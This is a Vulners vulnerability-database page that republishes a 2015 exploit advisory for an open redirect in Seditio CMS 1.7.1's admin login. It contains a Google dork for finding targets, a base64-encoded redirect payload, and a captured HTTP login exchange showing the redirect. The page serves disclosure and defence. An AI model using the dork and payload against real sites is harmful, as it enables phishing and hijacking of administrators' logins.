Vulners
Lucene search
Seditio CMS 1.7.1 Open Redirect
`[+] Exploit Title: Seditio CMS Open Redirect
[+] Google Dork: intext:"Powered by Seditio CMS"
[+] Date: 27/7/2015
[+] Exploit Author: Arash Khazaei
[+] Vendor Homepage: http://www.seditiocms.com/
[+] Software Link: http://www.seditiocms.com/page.php?id=20&a=dl
[+] Version: 1.7.1(Last Version)
[+] Tested on: Kali , Windows
[+] CVE : N/A
======================================================
[+] introduction:
[+] an open redirect Vulnerability In Admin Login Page Harmed The Cms .
[+] And Can Used For Bypass CSRF For Changing Admin Password , Phishing and
... .
======================================================
[+] Poc:
[+] For Exploiting This Vulnerability We Need encode Our ULR To Base64 .
[+] Our URL : Google = aHR0cDovL2dvb2dsZS5jb20= .
=====================
[+] Defualt Redirect Page Is /admin.php This Mean After Admin Logged In
Will Be Redirected To /admin.php Page .
[+] Default Url :
http://localhost/users.php?m=auth&redirect=L2FkbWluLnBocA==
[+] if we change encoded url with Our Encoded URL Admin After Login Will Be
Ridirected To GOogle.com
[+] Our Url :
http://localhost/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Result :
[+]
http://localhost/sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] POST /sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20=
HTTP/1.1
[+] Host: localhost
[+] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101
Firefox/38.0
[+] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[+] Accept-Language: en-US,en;q=0.5
[+] Accept-Encoding: gzip, deflate
[+] Referer:
http://localhost/sido/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Cookie: SEDITIO=MDpfOjA6XzpzcGVjaWFs; KCFINDER_showname=on;
KCFINDER_showsize=on; KCFINDER_showtime=on; KCFINDER_order=type;
KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=on;
timezoneOffset=16200,0;
__utma=111872281.449674650.1437406401.1437406401.1437406401.1;
__utmz=111872281.1437406401.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
PHPSESSID=97amucvohmev2ltkkmhi9jl9e3
[+] Connection: keep-alive
[+] Content-Type: application/x-www-form-urlencoded
[+] Content-Length: 64
[+] rusername=admin&rpassword=admin1&rcookiettl=0&x=97AMUCVOHMEV2LTK
[+] HTTP/1.1 302 Found
[+] Date: Mon, 27 Jul 2015 17:45:08 GMT
[+] Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15
[+] X-Powered-By: PHP/5.5.15
[+] Expires: Thu, 19 Nov 1981 08:52:00 GMT
[+] Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
[+] Pragma: no-cache
[+] Location: message.php?msg=104&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Content-Encoding: gzip
[+] Vary: Accept-Encoding
[+] Content-Length: 20
[+] Keep-Alive: timeout=5, max=100
[+] Connection: Keep-Alive
[+] Content-Type: text/html
[+] You Can See HTTP 302 Found And Redirected . To Google .
Vulnerable Code In /system/core/users/user.auth.php
$t->assign(array(
"USERS_AUTH_TITLE" => $L['aut_logintitle'],
Vulnerable -> "USERS_AUTH_SEND" =>
"users.php?m=auth&a=check&redirect=".$redirect,
Discovered By : Arash Khazaei
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jul 2015 00:00Current
7.4High risk
Vulners AI Score7.4